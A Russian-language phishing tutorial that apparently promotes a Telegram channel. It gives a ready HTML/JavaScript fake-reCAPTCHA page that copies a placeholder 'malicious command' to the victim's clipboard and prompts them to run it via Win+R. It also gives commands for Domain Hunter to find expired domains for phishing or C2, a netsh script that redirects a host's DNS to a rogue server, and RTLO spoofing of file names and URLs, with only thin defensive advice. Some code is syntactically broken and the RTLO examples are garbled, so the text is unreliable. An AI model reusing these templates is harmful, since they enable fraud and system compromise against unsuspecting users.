Ниже приведён пример того, как настроить такую фишинговую страницу с помощью HTML, CSS и JavaScript, имитирующую интерфейс поддельной reCAPTCHA и механизмы для выполнения команд.

<!DOCTYPE html>
<html>
<head>
    <title>Verify You Are Human</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            padding-top: 20%;
            background-color: #f1f1f1;
        }
        .container {
            background: white;
            border-radius: 8px;
            padding: 20px;
            box-shadow: 0 0 10px rgba(0,0,0,0.1);
            display: inline-block;
        }
        .button {
            padding: 15px 30px;
            border: none;
            background: #4285f4;
            color: white;
            font-size: 16px;
            cursor: pointer;
            border-radius: 5px;
            margin: 10px;
        }
    </style>
</head>
<body>
    <div class="container">
        <h2>Verify you are human</h2>
        <button class="button" onclick="showVerifyWindow()">Verify</button>
    </div>
    <script>
        function showVerifyWindow() {
            var command = 'your-malicious-command-here';  // Здесь должна быть ваша вредоносная команда
            var verificationCode = '7624';  // Пример кода, можно рандомизировать
 // Показать фальшивое окно reCAPTCHA
            alert('Validation in the Run box to "hide" the command (✅ "I am not a robot - reCAPTCHA Verification ID: ' + verificationCode + '")')
          // Копирование команды в буфер обмена (пример замены на реальное выполнение)
            navigator.clipboard.writeText(command).then(function() {
                alert('Команда скопирована в буфер обмена. Откройте диалоговое окно "Выполнить" (Win+R) и вставьте её для продолжения.');
            });
        }
    </script>
</body>
</html>

Как это работает:

1. Поддельная reCAPTCHA: Страница отображает кнопку "Verify", которая симулирует процесс проверки reCAPTCHA.
2. Копирование команды: Когда пользователь нажимает кнопку, JavaScript копирует вредоносную команду в буфер обмена.
3. Мошенничество с командой: Пользователю предлагается открыть диалоговое окно "Выполнить" (Win+R) и вставить скопированную команду, которая затем выполняется на системе.

Эта атака ориентирована на пользователей, которые доверяют подобным формам проверки и не подозревают о том, что вводят вредоносную команду в свою систему.

Domain Hunter — это мощный инструмент предназначенный для поиска просроченных или доступных доменов, которые ранее использовались в безвредных целях, но могут быть перепрофилированы для фишинговых атак или задач командного управления и контроля (C2).

Основные функции:

• Получение недавно истекших доменов с сайта ExpiredDomains.net.
• Выполнение проверки репутации доменов через такие сервисы, как Symantec Site Review, IBM X-Force, и Cisco Talos.
• Вывод результатов в текстовых и HTML-форматах с ссылками на источники проверки репутации и записи на Archive.org.

Примеры использования:

Поиск доменов, связанных с определённой темой:

• Команда ищет просроченные домены, связанные с "apples", проверяет их репутацию и обрабатывает CAPTCHA:

./domainhunter.py -k apples -c --ocr -t5

Проверка репутации одного домена:

• Выполняется детальная проверка репутации для одного домена:

./domainhunter.py --single mydomain.com

Поиск и проверка недавно истекших доменов:

• Получение и проверка репутации для 1000 недавно просроченных доменов:

python3 ./domainhunter.py -r 1000

DNS Hijacking, также известный как DNS-перенаправление, представляет собой технику манипуляции процессом разрешения доменных имен. Злоумышленники могут вмешиваться в процесс преобразования доменных имен в IP-адреса, перенаправляя трафик на вредоносные сайты, блокируя доступ к легитимным ресурсам или перехватывая и изменяя сетевой трафик. Этот метод часто используется в фишинговых атаках для обмана пользователей, перенаправляя их на мошеннические сайты, которые выглядят как легитимные.

1. Перенаправление на поддельные DNS-серверы

• Злоумышленники могут настроить вредоносное ПО для изменения настроек DNS на компьютере жертвы, чтобы использовать поддельный DNS-сервер, который они контролируют. Этот сервер затем перенаправляет запросы на вредоносные сайты, имитирующие легитимные.

Пример: Когда пользователь пытается зайти на bank.com, поддельный DNS-сервер может направить его на фишинговый сайт, который выглядит как настоящий сайт банка.

2. Компрометация доверенных DNS-серверов

• Злоумышленники также могут взломать или использовать уязвимости доверенных DNS-серверов, чтобы изменить ответы, которые они предоставляют. Это может включать инъекцию вредоносных записей в DNS-кэш или изменение DNS-записей.

Пример: Атакующий может изменить запись DNS для paypal.com, чтобы она указывала на фишинговый сайт вместо настоящего сайта PayPal.

3. Атаки «человек посередине» (MITM)

• Перенаправляя DNS-запросы на сервер, который они контролируют, злоумышленники могут перехватывать и изменять веб-трафик между пользователями и целевыми сайтами. Это может привести к краже данных или дополнительным фишинговым атакам.

4. Манипуляция со стороны провайдера или DNS-поставщика

• Иногда интернет-провайдеры или поставщики DNS могут перенаправлять пользователей на свои собственные серверы для показа рекламы или других целей. Хотя это менее злонамеренно, чем настоящий DNS-перехват, это может повлиять на пользовательский опыт и конфиденциальность.

Влияние на фишинг

• Обманчивые сайты: DNS-перехват позволяет злоумышленникам создавать фишинговые сайты, которые выглядят идентично легитимным, обманывая пользователей и заставляя их вводить конфиденциальную информацию, такую как логины и пароли.
• Кража учетных данных: Перенаправляя пользователей на фальшивые страницы входа, злоумышленники могут похищать имена пользователей, пароли и другую личную информацию.
• Социальная инженерия: Злоумышленники могут использовать перехваченные домены для рассылки фишинговых писем с ссылками на вредоносные сайты, увеличивая вероятность успешной атаки.

Обнаружение и предотвращение

• Мониторинг DNS и безопасность: Используйте инструменты для мониторинга DNS, чтобы выявлять подозрительные изменения в DNS-записях или необычные схемы трафика.
• Расширения безопасности DNS (DNSSEC): Внедрите DNSSEC для обеспечения того, что ответы DNS являются подлинными и не были изменены.

Пример сценария для DNS-перехвата

Ниже приведён пример на Python, демонстрирующий, как хакер может изменить настройки DNS на компьютере с Windows, используя команду netsh. Этот код предназначен только в образовательных целях и показывает, как злоумышленники могут модифицировать настройки DNS.

import subprocess
# Замените на IP-адрес поддельного DNS-сервера
rogue_dns_server = "10.0.0.1"
# Получить текущие настройки DNS
current_dns_servers = subprocess.check_output(["netsh", "interface", "ip", "show", "dnsservers"]
# Изменить настройки DNS, чтобы они указывали на поддельный DNS-сервер
subprocess.call(["netsh", "interface", "ip", "add", "dnsservers", "Wi-Fi", rogue_dns_server]
# Подтвердить, что настройки DNS были изменены
new_dns_servers = subprocess.check_output(["netsh", "interface", "ip", "show", "dnsservers"])
print(new_dns_servers.decode())

Fast Flux — это продвинутая техника, используемая киберпреступниками для скрытия местоположения своих фишинговых сайтов и сайтов, распространяющих вредоносное ПО. Постоянно изменяя IP-адреса, связанные с доменом, Fast Flux затрудняет работу команд безопасности и правоохранительных органов, которые пытаются отследить и заблокировать эти сайты. Эта техника использует сеть скомпрометированных хостов, действующих в качестве прокси, тем самым увеличивая устойчивость и анонимность ботнета.

Основные аспекты Fast Flux:

1. Динамические записи DN

• Fast Flux опирается на динамические DNS-записи, чтобы часто менять IP-адреса, связанные с доменом. Каждый раз, когда выполняется DNS-запрос, ответ может содержать разные IP-адреса, что затрудняет отслеживание реального местоположения вредоносного сервера.

2. Ботнет из скомпрометированных хостов

• Эта техника использует большую сеть заражённых компьютеров, которые действуют в качестве прокси. Эти скомпрометированные хосты непрерывно добавляются и удаляются из DNS-записей, что обеспечивает быструю смену IP-адресов.

3. Сети Peer-to-Peer (P2P)

• Fast Flux можно комбинировать с P2P-сетями, где узлы ботнета общаются напрямую друг с другом. Это усложняет отслеживание и разрушение сети.

4. Распределённое управление и контроль (C2)

• Распределение инфраструктуры C2 (Command and Control) на многие узлы повышает устойчивость ботнета. Даже если один узел будет отключен, другие продолжают работать, поддерживая контроль над скомпрометированными хостами и фишинговыми операциями.

5. Веб-балансировка нагрузки

• Fast Flux часто использует балансировку нагрузки через веб-прокси, распределяя трафик между несколькими прокси-серверами. Это затрудняет блокировку или фильтрацию вредоносного трафика, поскольку IP-адреса и конечные точки постоянно меняются.

6. Прокси-перенаправление

• Вредоносные сайты, использующие Fast Flux, часто перенаправляют пользователей через несколько прокси-серверов, что ещё больше затрудняет определение истинного местоположения сервера, распространяющего вредоносное ПО или фишинг.

Пример сценария симуляции Fast Flux

Ниже приведен фрагмент кода на Python, который демонстрирует упрощённую симуляцию работы DNS-сервера с использованием Fast Flux. В этом примере сервер DNS возвращает несколько IP-адресов для данного домена, используя библиотеки dnslib и socket.

import dnslib
import socket
# IP-адрес DNS-сервера (замените на нужный)
dns_server = "8.8.8.8"
# Доменное имя, которое вы контролируете
domain_name = "example.com"
# IP-адреса скомпрометированных хостов, которые будут действовать как прокси
proxy_addresses = ["10.0.0.1", "10.0.0.2", "10.0.0.3"]
# Создание DNS-запроса для доменного имени
query = dnslib.DNSRecord.question(domain_name)
# Отправка DNS-запроса на DNS-сервер
dns_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
dns_socket.sendto(query.pack(), (dns_server, 53))
# Получение ответа DNS от DNS-сервера
response = dnslib.DNSRecord.parse(dns_socket.recv(4096))
# Изменение DNS-ответа, чтобы включить IP-адреса скомпрометированных хостов
response.add_answer(*dnslib.RR.fromZone(f"{domain_name} A " + " ".join(proxy_addresses)))
# Симуляция отправки измененного DNS-ответа обратно клиенту (требуется реальный адрес клиента и порт)
client_address = ("client_ip", 12345)  # Замените на реальный адрес и порт клиента
dns_socket.sendto(response.pack(), client_address)

Как это работает:

1. Создание запроса DNS: Скрипт отправляет DNS-запрос на DNS-сервер для определенного домена.
2. Получение ответа DNS: Полученный ответ перехватывается.
3. Изменение ответа: Ответ модифицируется, добавляя несколько IP-адресов (скомпрометированных хостов) для домена, чтобы симулировать работу Fast Flux.
4. Отправка клиенту: После модификации ответ отправляется обратно клиенту.

Загрузка "доверенного" файла — это сложная техника фишинга, при которой злоумышленники используют легитимные сервисы или сайты для распространения вредоносных файлов. Эта методика основана на обмане пользователей, заставляя их загружать файлы, которые кажутся безопасными и исходят из надежного источника, но на самом деле предназначены для компрометации их систем.

Основные этапы атаки:

1. Эксплуатация доверенных источников

• Злоумышленники могут использовать скомпрометированные или легитимные веб-сайты для хостинга или ссылки на вредоносные файлы. Эти сайты часто являются доверенными для жертвы, что делает фишинговую атаку менее подозрительной. Использование доверенного источника снижает риск того, что пользователь насторожится и откажется загружать файл.

2. Обфускация и ложная информация

• Вредоносный файл обычно замаскирован под легитимный документ, например, PDF, Word или исполняемый файл. Файл может содержать макросы, скрипты или другие типы вредоносного ПО, которые используют уязвимости в системе жертвы. Файл может быть назван или представлен так, чтобы соответствовать контексту, в котором работает жертва, что повышает вероятность открытия файла.

3. Механизм доставки

• Вредоносный файл обычно доставляется через вложения в электронных письмах, ссылки в фишинговых письмах или через скомпрометированные легитимные сайты. Фишинговое письмо или сообщение часто содержит убедительное содержание, побуждающее пользователя загрузить и открыть файл. Например, это может быть ложное уведомление от службы поддержки или предложение скачать обновление программного обеспечения.

4. Выполнение и полезная нагрузка

• После того как пользователь загружает и открывает файл, он может выполнить вредоносный код, который крадет учетные данные, устанавливает дополнительное вредоносное ПО или эксплуатирует уязвимости системы. В зависимости от типа атаки, это может привести к краже личных данных, удалённому управлению устройством или установке троянов для дальнейших атак.

Как защититься от Reflective File Download:

1. Будьте бдительны при работе с вложениями и ссылками, даже если они исходят от доверенных источников.
2. Используйте антивирусные программы и расширенные фильтры электронной почты для обнаружения и блокировки подозрительных вложений.
3. Ограничьте использование макросов в документах и регулярно обновляйте программы для устранения уязвимостей.
4. Проверяйте подлинность источника загрузки файлов, особенно если файл предлагается для скачивания неожиданным образом.

Эта техника сложна, потому что она использует доверие к легитимным источникам и замаскированные вредоносные файлы, что затрудняет их обнаружение пользователями и даже системами безопасности.

RTLO (Right-to-Left Override) атаки — это техника, использующая символы управления Unicode для обмана пользователей и маскировки истинной природы вредоносных файлов или ссылок. RTLO особенно опасен в фишинговых атаках, поскольку он меняет направление текста, делая имена файлов или URL-адресов кажущимися безопасными.

Что такое RTLO?

RTLO (Right-to-Left Override) — это управляющий символ Unicode, используемый для изменения направления текста. Он применяется в языках, которые пишутся справа налево, таких как арабский и иврит, и его цель — изменить направление отображения символов, идущих после него.

Значение Unicode: U+202E

Функция: Меняет направление последующего текста с левого направо на правый налево.

Как RTLO используется в фишинге

Злоумышленники могут использовать RTLO-символ для маскировки истинной природы файлов, URL-адресов или email-адресов, что затрудняет их обнаружение пользователями или системами безопасности.

Маскировка расширений файлов:

Злоумышленники могут вставить RTLO перед расширением файла, чтобы изменить его видимый формат и обманом заставить пользователя подумать, что файл безопасен.

Пример:

• Оригинальный файл: document.exe (исполняемый файл)
• Обфусцированный файл с RTLO: document pdf.exe

В результате файл может выглядеть как document.pdf, что введет пользователя в заблуждение и повысит вероятность открытия вредоносного исполняемого файла.

Обманчивые URL-адреса:

Атаки с использованием RTLO могут изменять внешний вид URL, создавая видимость того, что они ведут на безопасные сайты.

Пример:

• Оригинальный URL: http://malicious.com/bank-login
• Обфусцированный URL с RTLO: http://bank-login moc.suoicilam.com

Визуально этот URL выглядит как http://bank-login.com, хотя фактически перенаправляет пользователя на malicious.com

Маскировка email-адресов:

RTLO может быть использован для создания обманчивых email-адресов, которые кажутся легитимными, но направляют на вредоносный адрес.

Пример:

• Оригинальный адрес: support moc.knabyruoy@
• Адрес выглядит как support@yourbank.com, но фактически является обманчивым и направлен на другой домен.

Злоумышленник может использовать RTLO для создания ложного ощущения безопасности, чтобы обмануть пользователя и заставить его перейти по вредоносной ссылке.

Как защититься от атак с использованием RTLO:

1. Внимательность: Всегда обращайте внимание на необычные символы в именах файлов, особенно если они имеют неожиданные расширения.
2. Просмотр полного пути файла: Перед открытием файлов проверяйте их полный путь и расширение через свойства файла.
3. Использование антивирусов и фильтров: Современные антивирусные программы и фильтры могут обнаружить использование RTLO и предупредить пользователя о подозрительных файлах или ссылках.
4. Отключение макросов: Важно отключить выполнение макросов в документах, полученных из неизвестных источников.

RTLO-символы могут быть мощным инструментом для маскировки вредоносных файлов и ссылок, делая их на первый взгляд безопасными, но при правильных мерах предосторожности эти атаки можно обнаружить и предотвратить.

Примеры фишинговых писем различных группировок:
https://github.com/wddadk/Phishing-campaigns

Обход двухфакторной аутентификации с помощью фишинга и OTP-ботов:
https://securelist.ru/2fa-phishing/109677/

Использование досок объявлений в фишинге:
https://securelist.ru/message-board-scam/109548/

Наш канал: https://t.me/+eATHVyrDVPUwYzk8
Наш чат: https://t.me/+hDPQsUT7YEljNzc8